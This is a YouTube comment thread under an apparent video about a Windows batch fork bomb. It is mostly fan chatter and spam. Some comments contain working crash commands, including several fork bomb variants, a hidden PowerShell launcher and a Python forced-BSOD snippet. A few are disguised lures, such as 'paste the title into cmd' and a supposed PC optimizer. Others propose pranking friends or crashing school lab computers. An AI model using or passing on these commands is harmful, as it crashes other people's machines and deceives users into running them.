1 likeit's so weird coming back after years and hearing him tallk
0 likes2:12 you could've also pressed Ctrl+Shift+Windows key+B to reset the video drivers.
0 likesThat's for what we've waited 3 months
0 likesEasier way to make your pc crash like that : bluestacks, a vm, and spotify or discord call ^_^
1 likeWhere you downloaded your cursor?
2 likeshey enderman Im your fan for about a year now. I have video suggestion. Can you try to get a cupy of windows on icloud, foofle drive or dropbox?
1 likeReplies (1)
foofle
1 likeYaaayyy a new voiced video!
5 likesYou know its a great day when enderman uploads
2 likesHey Enderman! Windows 10 HOME Edition Users cant install sandbox windows feature rn for some reason. Could u install windows 10 home and try to hack it to run sandbox? I think Windows home users had sandbox, but its just randomly wont work anymore. Love ur videos❤
2 likesOne way I usually explain fork bombs is a hydra with auto-decapitation. Simple enough for most to understand ig.
0 likesIt crashed so brutally, Windows 11 thought it was Windows 95
0 likesI hoped for the old old old bluescreen
Thanks for the idea. Now I'm going to try it out on my college lab computer 😈😈😈
0 likeswhere did you get your curser from? i want it too
1 likeThose Tasks Are Called "Cmd" in Taskmgr , It Takes about 0.1MB To 0.7MB (In My Windows 11 VM Test)
0 likesFun fact, fork doesn't duplicate memory until something is changed in execution, so if your forked task doesn't create new memory or do stuff, afaik it doesn't copy at all
0 likesthe windows fork bomb, thats insane
0 likesCan you do Windows instaling speedrun? also nice video
0 likesIt would be fun to set that as a startup program
0 likesi used to watch this guy so much
1 likeBabe wake up a new Enderman video just dropped
17 likesDo you plan to do some content on Windows PE? Playing games, exploring differences, modding it, showing quirks and interesting discoveries, idk... adding copilot, microsoft store, desktop, WSL and things like that. Imho it's a goldmine of content
0 likesEnderman Upgraded to Windows 11 Again!
1 likeWith the amount of fallbacks and error checks windows has, that’s pretty impressive. No bluescreen either.
0 likesNo windowses harmed in this video
0 likesEnderman is back, Let's go!
1 likebro’s got the ^_^
0 likeswen the task manager goes not responding, you know it's bad
0 likesim using this on my simple Visual Novel game/mods to punish cheaters. and yes, they frightened and screams inside their 'help tickets'
3 likesI wanted to donate you some money to support you, even though i don't have that much (wanted to donate atleast 0.67$) But I'm from Belarus and under 14, so i cant link my card to google play. When i open my own bank account i will definitely donate.
0 likesYour videos are cool and i like them. Youre one of the few toutubers that knows a lot of information about computers and fun to watch. I hope your youtube account doesnt get suspended/terminated in the future
3:47 Elok musk cat
1 likeI have batch that I made long time ago (at least 10 years ago) that have only 5 chars: %0|%0
0 likesthat's it, that was all that make it for fork bomb. Your is just have intermediate state of manually creating one. In my case it was produced popup windows as well and parent was long time destoryed, so there is no way to "terminate tree", you can't stop it because it already closed and every frame it created 2 new ones and one was destroyed. So it is more guaranteed solution to eventually kill everything..
Ahhh that intro feels amazing to hear again.
0 likesYour channel is awesome!!! Love from Czech ❤️🇨🇿!!! I hope you one day have 1M subscribers!!!! I'm your huge fan!!!
0 likesI like the symbols on your desktop :) You even have the good old Zuma Deluxe, like me.
0 likesthe only fork bomb with a ^_^ in it
0 likesPov:it crashes so bad that it can't even load aero basic and loads fallback
0 likespro version of
1 like@echo off
:virus
start cmd.exe
goto :virus
As a consequence of this spell, a script that creates and runs a copy of itself will be ran recursively. Fork Bomb!
0 likesIs this the windows equivalent of a fork bomb
0 likesWow Enderman updated!!!! I have been watching your video since 2019
0 likes“Isn’t beautiful?”😍
0 likesThis is basically the same thing as that one “don’t type this in your Linux terminal” meme
0 likesyo enderman, how did you make your windows look so clean? and made command prompt have tabs??
0 likesWoah, your voice tho... You're the master of Windows aren't You? Cheers :)
0 likesIt's also a way to expose the classic theme, though
0 likesWow i searched ur channel today, and watched some vids, welcome back Man! 🎉👾
0 likes0:23 that same bug happens for me on windows 10 too, it just started bugging sometimes for no reason few months ago
1 likeJust realized at the end that you have portal installed...
0 likesImagine having the fork bomb running while playing portal...
i didn't know that there was an alternative to linix fork bon for window bat
6 likesendermanch, i watch you for 2-3 years but recently no video and i told wtf out loud when i saw this.
0 likes"command script or batch script are interchangable" theres a very, very slight difference: in batch scripts,the ERRORLEVEL variable does not get reset after a successful command, whereas in a .cmd script, it does
0 likesReplies (1)
glad you pointed that out, i was also just about to say that.
0 likesAh another beautifully engineered line of batch code
0 likesnot a fork, you just create a process that create another process, not two processes, so is liniar...
1 likeHe is back 😊 nice to see u back 🎉
2 likesI like that desktop
0 likestruly one of the little harmless trolls to send firends
0 likesGreat video title Enderman! Truly a creative title
1 likewindows 11 meets the league of terminal corruptions. 1. cmd|cmd. 2. @echo.%0^|%0›$^_^.c^md&$_›nul
1 likelinux: i am immune to these dumb commands
GUYYS HE FINNALLY UPLOADED
1 like2:19 classic windows theme?
1 likeI needed o put spaces like on the tattoo but it only crashed my terminal
1 likeEdit: nope my laptop started throttling up after i posted this comment 💀
Fun fact: if you type a YouTube video's title into command prompt, it will open up your browser and redirect to the video! You can even try it right now by opening cmd and copy and pasting this video's title.
1 likeReplies (5)
@@Redo-j9o 😥😭
0 likes@@shantilkhadatkar1195 No way you actually got tricked? you should've watched the video. and you wouldn't fall for it.
0 likes@@shantilkhadatkar1195 what command did you use I'm gonna use it on my vm to use
0 likesSo my pc crashed and here i am after a fresh install. I feel dum
0 likesIt does not. Command not found
0 likesyay my favourite minecraft mob OS breaker
0 likestry trolling tech support scammers with windows s mode
1 likeNew video idea: Try to dual boot Windows 10 and Tiny 10...
0 likesI remember doing something back in school, on some shitty Core 2 DUOs and 2GB of ram, and the funny part was that I was able to sent it to all computers on the school network for some odd reason, and it was really causing alot of chaos in the school that they reinstall Windows not once, BUT 3 TIMES. And we ended up using Linux by the year of the semester.
0 likes'$_>nul' is not recognized as an internal or external command, operable program or batch file.
0 likesDoesn't work anymore
3 likesGlad to see you back. Keep crashing Windows into Windows into Windows into Windows into Windows into Windows into Windows in...
0 likesThis command creates an infinite loop in the Command Prompt (cmd) using special characters to obfuscate its purpose.
0 likesZuma's revenge
0 likesYou were my first windows channel
0 likesthat was not the video driver that crashed, as when the first error for cmd happened and it was shown, it was the old theme, indicating dwm.exe had an exception or crashed itself, windows does restart dwm.exe if it gets an exception ,so it is dwm.exe. if it was the graphics drivers it would of defaulted from the main display (in your case, on a vm, the vmware display) to "Microsoft Basic Display" and the res would of got to 800x600, but it didn't, indicating dwm.exe crashed - not an exception, as it would of said, in an error "dwm.exe exception". but it didn't, indicating in dwm.exe crashing
0 likeswait till youtube thinks this is another trusted installer video
0 likesWindows security be like:
0 likesi love how it contains "^_^"
0 likesmuch beautiful in the start
0 likesKnew that its a forkbomb, it was obvious by the %0|%0
0 likesHow to bring back the Windows 7 theme: the hard way
0 likestime to troll my friends once again
1 likeReplies (2)
yes
0 likesNo
0 likescrtl shift windows key b resets the drivers
1 like8:26 Is it just me or is that PrisimLauncher in the right with the icon renamed to “Minecraft”? If it is Prisim, that means that you (Enderman) use the same launcher as me!
1 likeReplies (1)
I use Prism aswell
1 likeOH MY GOD HE TALKS THE DAY HAS FINALLY COME!!!❤️
0 likesThis is a very good troll for friends :D
0 likesSame happened on my XP machine but the video driver didn't crash here
0 likesDid they already patch it? It doesnt work for me
2 likesCould you upload a video that debloating windows 10 extreme, removing all the garbage but that can be used so that it consumes very little?
0 likesI miss the days where music would be in the background and you'd be speaking or the captions do it for you lol
0 likes8:08 Vsauce!!!!!!!
1 like%0|%0 looks like a fork-bomb immediatly
0 likesat least its happy about it ^_^
0 likes"em sowwy ^_^"
0 likesthe way he says duplicate 😭
0 likesidk what hes saying but im enjoying it
0 likesUse python to bsod:
0 likesimport ctypes
ntdll = ctypes.windll.ntdll
prev_value = ctypes.c_bool()
res = ctypes.c_ulong()
ntdll.RtlAdjustPrivilege(19, True, False, ctypes.byref(prev_value))
if not ntdll.NtRaiseHardError(0xDEADDEAD, 0, 0, 0, 6, ctypes.byref(res)):
i get it now, "you all chose long form videos! happy to say, they are coming. a large batch "
0 likescrazy
2 likesMan, I love this content.
0 likesThis is why I use Windows.
I love destroying it thanks ender man
It made my pc start barking (like a 🐕)
0 likesan irrelevant question but, you did a video about running windows on RAM. it was 16gb, and it did have some issues due to the low capacity, but other than that it ran super fast and well. What happens if you used, lets say, 128GB, or 64gb?
0 likesJust in time for my MBR locker crash payload!
0 likesBro made a Windows fork bomb
0 likesthe stuff you'd do in the IT lab
0 likesFINALLY THE LEGEND IS BACK!
1 likeBack at it again with the bangers
0 likesWhen you choose water instead of fire (nobody will get this)
0 likesGlad to see you back Enderman :)
0 likesI entered this in cmd before even clicking the video 💀 Luckily my pc didn't crash
0 likesWatchig this gives me pain, Idk if possible or not but I keep screaming ctrl + shift + windows + B T^T
0 likeshes back yay
0 likeswondering how you got your windows 11 system to this state? which mods did you use?
0 likesendermanch is back, yay!
0 likesThat's what's my laptop slow look like
0 likesStrings that break things fill me with a strange joy.
0 likesedit: Who with sponsorblock marked the initial demonstration as "filler"? That's the opposite of filler...
Edit2: Did you actually say windows' name was more sensible than linux? Create process doesn't imply it's a duplicate process in the name. IMO, fork makes more sense.
Somewhere someone’s antivirus is having a hissy fit and blocking YouTube
0 likesJust like that weird bitmap command a few years back that essentially was just disk check
^_^ crashed computer.
1 likeI like ur videos they nice to watch
0 likesGreat video Andrew! Glad you are back :)
0 likesWhere can I find your host’s computer mouse pack? is it downloadable from anywhere
0 likesI thought this was a jumpstyle video
0 likes5:54 how did you make your windows look so nice?
0 likesReplies (1)
startallback
0 likes2:42 🫖🫖🫖🫖🫖
0 likes“The system cannot run the specified program.” Then it crashed. Thats when you know that that is a lie.
0 likesBaby wake up new enderman video
0 likesIt’s safe it’s got ^_^
0 likesW
4 likesWorks in Windows XP (VMware)
0 likesI Heard that ctrl + shift + win + b in the specific order i gave you should reset the video driver
0 likesREMEMBER!
0 likesOnly do this in a VM and not your own PC.
otherwise you will... well you know already
the crash was so bad the error message forgot its componets
0 likesmonoxide.exe lore
0 likesStart-Process -WindowsStyle Hidden cmd.exe -ArgumentList '/c @echo.%0^|%0>$^_^.c^md&$>_nul' works like a charm in PowerShell, it also does in a PowerShell script.
0 likesLets gooo! U are back buddy!!!
1 likeCould you upload a video that debloating windows 10 extreme, removing all the garbage but that can be used so that it consumes very little?
0 likesyooooo he's back!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! also fyi i'm still mod so if you want to demote me.
1 likethe command also contains "^_^"
3rd time of asking windows 7 uefi class 3 (no csm) guide
1 likeWhat a title
0 likesBut can you do something similar in Unix???
0 likesI was just thinkin yesterday how you stopped uploading again.
0 likesOH MY PCCC
0 likesWake up honey, new Enderman video is out.
0 likesthe fact that it's called a fork bomb and not a pipe bomb deeply infuriates me
0 likescrash trigger
0 likesCon con is back
0 likesfun fact: i tried to run this on my windows 10 vm, worst mistake 😁
0 likes(managed to power it off thankfully 😅)
can you chapter this video to "testing the command" and "explaining the command"
0 likesi didnt know the "echo" command can crash windows
0 likesWindows couldnt use the power of fork by rules. :/ Well, point to linux i guess.
0 likesi love this guy
0 likesi think it's more likely that dwm got issues instead of the video driver
0 likesNice to see ur posting again 😁
0 likesCon con is want to back to get BSOOOOODS
0 likesSo basically the "you are an idiot" thing but with a command instead
0 likesBest channel ulpoads once more
0 likes%0|%0 = 100% memory
0 likesPlease do a vid for Win CE its such a mistirus OS
0 likesso thats just %0|%0 but in cmd?
1 likenul
0 likesor...
null from baldi basics
shouldve tried ctrl+shift+win+B
0 likesFinally a new upload
0 likesWe missed u!
have you tried Ctrl+Shift+Win+B? (restart video driver shortcut)
0 likesHad to run 10 instances of it on my laptop to get the video driver to crash (it's randomly crashing and coming back at this point)
0 likesC:\con\con
1 likeedit:
so I just tried it, it's kinda ass, I had it running for like half an hour and it did shit
even :loop start %~f0 goto :loop is more effective... but at least it looks cool
I’d be curious to know if Ctrl + Win + Shift + B would help with the graphics crash.
1 likeReplies (1)
Try it bro
0 likesWhats the song from the intro? If its even a full song
0 likesThanks, now i will use this to prank my friends AHAHAHA! 😈
0 likesReplies (2)
@@rafapapolas8248 twas a joke, i could never be that cruel, even when it seems like it wont corrupt windows
0 likesbut if u r wondering if u could prank one of your friends, then be my guest. just make sure u try to not to tell one of your friends who understands batch syntax, to input it into command prompt...
Did it work?
0 likesamazing forkbomb enderman ❤❤🔥🔥
0 likesI got a generic, the command "$_›nul" is either wrong or not found (not native English windows)
1 likeReplies (1)
It needs to be a > symbol there
1 likesuch wise words
0 likesBring back the in video music pls
0 likeshow cool!
1 like"I think the display driver crashed"
0 likesWHY IS THE CURSOR THERE
It doesn't work on my machine.
3 likesReplies (2)
It was patched on newer versions of windows
0 likesSame, it just says, '$_›nul' is not recognized as an internal or external command,
2 likesoperable program or batch file.
My windows 11 PC Just Reseted...
0 likesThe title has "nul" in it, meaning bad in french
0 likes이거 생각해낸 사람 진짜 머리 좋네
0 likesI have try on VMWare.
0 likesmisspelled regex:
0 likesBABE WAKE UP ENDERMANCH POSTED A NEW VIDEO‼️
0 likesHere's a fun one ^-^
0 likesi='my god':
{
while i == true:
start calc.exe: /*include whatever process you think wastes the most resources here in this line*/
start %0^|%0 > $ _.cmd & $_:
goto i:
}
Edit: i just realized that for a boolean argument to be true, it has to have a mathematical argument that is true, not a string... Oof. I guess you could replace i='my god' with:
i=3+2 == 5
That way the evaluation will always be true.
Replies (1)
fun fact: brave's AI even considers the code malicious, and says it is a fork bomb, because of the obvious %0|%0.
0 likesYou could remove the ^ there, since it's just a escape character.
the only command that I know which makes windows hate you is powershell wininit
0 likesNEW ENDERMAN VIDEO 🎉🎉🎉🎉
0 likesVideo title is cursed or something :D
0 likesI literally have nothing to say, holy shit.
0 likeswelcome back
0 likesI dare you play games in Windows enter password screen
0 likesWelcome back Andrew!
0 likesandrew told me to re watch it so I am
0 likesBro wake up!!1! Endermanch uploaded a video!!!
0 likesWhat is your hardest in gd
0 likesWow good prank for friend, I pranked him and he deleted me from discord😭 but this is funny
0 likes4:36
0 likesdoes windows have any better ones though? alot of the time its just stolen from unix
lest go new video
0 likeswhat is the wallpaper at 8:11?
0 likesat echo period percent zero to the power of vertical bar percent zero over dollar sign to the power of underscore to the power of period c to the power of md ampersand dollar sign underscore over nul
0 likesu have to run in a vm dont do it (unless what a vm is.)
0 likesпочему без музыки в этот раз?
1 likeI've tried @echo.bat>>echo.bat
0 likesIt apparently changes behavior from the first run to the second.
I dunno what to do with it after that though, but there's something to the echo. command (particularly with the dot)...
Virus tutorial (JUNE 2024)
0 likes1. Do what ever you want to steal or skip this step
2. Delete the boot sector
3. @echo.%0^|%0›$^_^.c^md&$_›nul
4. money.
(I SWEAR ITS UP TO DATE)
I haven't seen that long fork bomb command before. Personally I use "%0|%0", is that behave the same?
0 likeshey Enderman I have a question. is Avast Free Antivirus good for windows11?
0 likesbecause when I downloaded steam he said that steam will give your laptop malwares and viruses
So I think that Avast is bad for laptops is this true?
Back two the viruses
0 likesI was about to try this until I heard the word reset lol
0 likesW let’s goo
2 likesit gives u a ^_^ message
0 likesI did the same thing and my compooter survived...
0 likesReplies (2)
@@Cloudieexwtf Resources of what?
0 likesIt depends on the amount of resources
0 likesoh!!!!you're alive!
0 likesit worked and my computer to explode :3
1 likewhat do one liners do could someone explain?
0 likesI assume this is a fork bomb...haven't gotten to the end but the symptoms remind me of the good old bash :(){ :|:& };:
0 likesNEW VIDEOOOOOOOOO
0 likesi deleted 1 file that dwm needs and it cant even boot into dwm and its just damm stuck
0 likesHe posted
0 likesLinux terminal mentioned.
0 likeshow do i get ur mouse cursor
0 likesHow did you add the rounded black cursor in Windows(your host?)
0 likesReplies (1)
Either copied then over, or the host runs rectify 11
0 likesbreh is % just $ lmaooooo
0 likesIs a fork bomb?
0 likestry Ctrl+Win+SHIFT+B
0 likesyooooooo an enderman video
0 likesnever mind bruh take my money 💀
0 likesLet's goooo new vid
0 likesYouTube planning to remove this video after seeing the title
0 likesGreat video!
0 likesAHHHHHHHHHHHHHHHHHHHHH
0 likesZuma Deluxe
0 likeswhat a title!
0 likesYAYY NEW VIDEO!!
0 likesWhy it dosent work on windows 7?
0 likesDo you can download windows 11 24H2 in intel Pentium end ram 2 GB ?
0 likesOk
1 likeyou are making videos only on windows
0 likesplease make a video on linux
hey enderman ive have used your website for many reasons and its been very useful but i cant find windows activation keys anymore have you removed them?
0 likesFinally after a hiatus ?
0 likeswhat if I press Ctrl+Shift+Win+B?
0 likeswake up enderman dropped another video
1 likemy favourite gd playre
0 likesLes go bro finally uploaded!
0 likesFun fact it dosnt work in the windows sandbox
0 likesHow big is the _.cmd after removing the redirect?
0 likesinstall windows 11 outside
0 likesfinally
0 likesmake more vids with utlraxp
0 likesHow to open cmd in OOBE windows 11?
0 likesExplain this to someone that doesnt even know what Echo does please.
0 likescan i get the wallpaper engine wallpaper?
0 likesLiking Windows 11 so far?
0 likesSo would this be safe to run on real hardware?
0 likesWhat's so special about this? It looks just like any time I need to use Microsoft Office.
0 likesThis dose not work on windows 10 apparently
0 likesalias fart fart; fart crashes Source
0 likesforce reboot? 2:13
0 likesit doesnt work anymore
0 likesThis was cool
0 likeshow do people even find this stuff
0 likesTELL ME HOW I WILL DIE IF I DONT KNOW HOW
0 likesWelcome back!
0 likesIt doesnt work for win11, I think. Or it got patched somehow.
0 likesHe is using prism launcher
0 likesenderman ^_^
3 likesLOL
0 likesBach or bash?
0 likesThe goat is back
0 likeshaha ^_^
1 likeWindows 11 Is funny
0 likesW!
0 likesfinally you're back 😢
0 likesEcho.
0 likes(echo)
(echo)
(echo)
Replies (1)
Threw out.
0 likesdoes ctrl shift windows b work?
0 likes🐢
0 likesHello Enderman! How are you?
0 likesLove you andrew
0 likesThis is cool
0 likesFina trick my friend with thsi
0 likesi was here during the premiere
0 likeswindows what can i say
0 likesMaybe because "nul" is one of the forbidden file names
0 likesim sorry i dont speak windowseese
1 likeEnderman talks now??? Since when dudeeee
0 likesLMFAO
0 likesdoesnt work on windows 10
0 likesit doesnt work for me
0 likesDo stream again.
0 likesThe system cannot
0 likesthe system cannot
0 likesHow did a command like echo destroy windows
0 likesWAAIITTT HEEE TALKES????
0 likesdoes this work on windows xp?
0 likesW vid
0 likesкогда видео про котейку?(
1 likeYay
0 likesmiss the old enderman with the text and the ncs 😞but i guess i gotta settle for this one
0 likes|:Jambi:|
0 likesYAY!!!!!!!! ARE YOU BACK. ARE YOU OK?
0 likesyeah he was so suprised!. realy. REALLY. oh for sure i mean it wasent very good of a computer. oh yeah
0 likesEXTEND IT WITH REPLAYS!
ты как-то связан с мысливцем?...
0 likesoo this seems.. crash-y
0 likesHello,can you send some information of a scam link?.The website is in spanish
0 likeslol
0 likesHello from premiere 🥰🎉
0 likeshow tf yall find out about those commands bruh
0 likesfor me the like is at 911... should i run?
0 likesYou sound like HaiX lol
0 likes1,900 views, 1 hour ago!
0 likesw
0 likesI tried app on fly didn’t work
0 likesLETTTSSS GOOOOO A NEW VID!!!!!!!!!! (plz heart my comment)
1 likeFinally 🎉
0 likesHi you finally did a vid
0 likesсигма
1 likebro how did you manage to put windows 10 taskbar buttons, round them, still have windows 11 search and taskview and 10 systemtray?? can anyone reply and tell me how he got the rounded 10 buttons and kept the 11 search and taskview?
0 likesReplies (5)
@@Jessycakeboyoh damn you were right. ig i shouldnt have 2nd guessed myself and gave up but yeah ig thanks
0 likes@@Jessycakeboyi doubt it but ok sure ill test it
0 likes@@ReaIYoBlue he uses startallback for that
0 likes@@Jessycakeboy i know but how the actual f*ck did he manage to do all those things i said
0 likeshe is running windows 11
0 likes🍉
0 likesok
0 likesWhy the ^_^ pls help
0 likesNEW VIDEO JUST DROPED
0 likesHERE BEFORE VIRAL
0 likeshuh
1 likeNew video!1!1!1
0 likesalt+f4 2.0
0 likeswhat vm do you use?
0 likesReplies (1)
vmware
0 likesforkbomb in windows??
0 likesReplies (1)
i guessed it.
0 likesBro wake up "Enderman" just posted a new video!
0 likes^_^ uwu
0 likesDang
0 likesThat's a interesting script, and gives a error with a suspicious looking windows 95 error code, Pretty nice,
0 likesReplies (1)
Will try it on my VM's, Because why not?
0 likesdamn
0 likesyo did you switch to windows 11?
0 likesReplies (1)
it is a win11 virtual machine
0 likesThere's a guy named Enderdev Impersonating you and uh Promoting Sh*tty Windows 11 "No Bloat ware"
0 likesrreal
0 likeslol
0 likeshe talks?
1 likeReplies (1)
Of course, you are just used to his "no talking, only text" videos, but you were just too lazy to watch videos where he is talking
0 likesor you somehow never clicked on a single video where he talks
BATCH IS HONESTLY THE WORST
0 likesI tried with a Mobile device nothing worked but I went on userland and executed the command (:(){:|:&};:) and it works (I tried it with a Mobile vm😅)
0 likesthere is no ESC
0 likesReplies (3)
@@Sonictheoofhog4 there is esc that is only on pc. maybe you was joking? Because that's what my brain said after I commented this
1 like@@CarlTheYoutuber10k what do you mean
0 likesOur Generation Is Doomed Dawg 😭😭😭💀💀💀
0 likesАlt+ctrl+z
0 likesAre you going do face reveal
0 likesGRRRRRRRRRRRR
0 likesmarch 4th 2024 in the corner 💀
0 likesEnderman please help me can you make Windows11assiat.exe please make a bypassing win11 eror in it i would recmond resoure hacker please make it i really needs to upgrade please
0 likesOk
0 likesHi
0 likes800th like
0 likesYo
0 likesWhat is this about
0 likesThats a interesting title
0 likesWindows is downed)
0 likes😢
0 likesPls hi
0 likesHiiiii
0 likesTest
0 likesYOOO FIRST TIME BEING THIS EARLY
0 likesshould of never scammed my robux
0 likesWhen are you responding to my comments and my mails
0 likesPlease dont hack me and run it
0 likesNO MORE SCAMMING
0 likesNO SCAM
0 likes348 views
0 likesThis forkbomb ironically doesn't work on french Windows 11 machines, tested it on my VM.
1 likeReplies (1)
There shouldn’t be any reason it does t, there is no difference between languages on windows 11
3 likes119th comment and 2100th viewer
0 likesЯ руский
0 likesEarly
0 likesU NO SCAM
0 likesDo lesbians get periods?
0 likesTHATS HOW BAD YOU ARE
0 likeshe stole my robux
0 likeswhy didnt you accept me
0 likes1. why
Ok
1 likeI am early yay ❤
0 likesstop scamming bro
0 likesthink you should go back to your old video style its better
0 likesyou speak russian?
0 likesC:\Users\WDAGUtilityAccount>%0|%0›$_.cmd
0 likes'%0' is not recognized as an internal or external command,
operable program or batch file.
premiere tickets here!
1 like👇
STOP
0 likesSTOP SCAMMINGH
0 likesты умееш говорить на русском?
1 likescammer tell me how you install windows in the trash bin
0 likeswow this guy is a scammer report him he should be banned
0 likesSTOP SCAMMING
0 likesyou are getting banned off youtube i will sue you for scamming all my robux
0 likesEnderman voice reveal?!?!?!!?!?!???!!?!??!?!?!
0 likesTHE WORST YOUTUBER EVER
0 likesthe worst youtuber ever
0 likesfake
0 likes1st
0 likesReplies (7)
@@techgame_ita fr
0 likes@@Thomario20 thanks i will cry just for you^_^
0 likes@@Thomario20=J
0 likesNice
0 likesYes
0 likesCry about it
ked
0 likesBruh you serius?
0 likesSCAMER
0 likesSCAMER
0 likesSCAMER
0 likesSCAMMING
0 likesReplies (1)
What?
0 likesU SCAM
0 likesscammer
0 likesscammer
0 likesscammer
0 likesscammer
0 likesscammer
0 likesscammer
0 likesscammer
0 likes^_^ bomb
0 likes"^_^"
0 likeslet me guese it rights to files it cant right to
0 likes^_^ uwu :3
0 likes^_^
0 likesI found an more helpful that optimizes you're PC:
0 likes@echo.&setlocal enabledelayedexpansion&set"_=)%"&for /f "b=*" %%# in ('echo(!%_:~1!0^|%0') do (set"_=!%%#:#=_!"&for /f "b=* delims=" %%_ in ("!_!") do (set"$=!%%_:%%~$^_^!"&call :^!&&set "$=!&set ^>!&&call^:#^_^!))>nul
SCAMMER
0 likesU SCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesSCAMMER
0 likesBEGONE SCAMMER
0 likesGRRRRRRRRRRRRRR SCAMMER
0 likestime to spam the COMMENTS until you tell me how to install windows in the Recycle.Bin
0 likesyoutube is full of scam videos so im just calling everyone a scammer
0 likes\—ˋ%)&(;,%#=(ˋ/\
0 likesbatchtro. command
0 likes^_^
0 likes^_^bomb
0 likes@echo.%0^|%0›$^_^.c^md&$_›nul
0 likes%0|%0 is all you need in windows
0 likeshey man, good video! btw there's a problem with malwarewatch website, i have 0/25 doenloads and when i download something this counter goes up to 25/25 on a single download. pls fix that!
0 likesthis is one of my favorites:
0 likesi='i'
while i:i+=i
''@echo.%0^|%0›$^_^.c^md&$_›nul''
0 likesyeah okay
>_<
0 likeshttps://en.wikipedia.org/w/index.php?title=Fork_bomb&direction=next&oldid=920227446 link to an old revision of wikipedia that contains a version of this that can be executed directly from the run prompt (cmd /k echo -^|->-.bat&-) that i've used a lot in highschool programming class for pranks
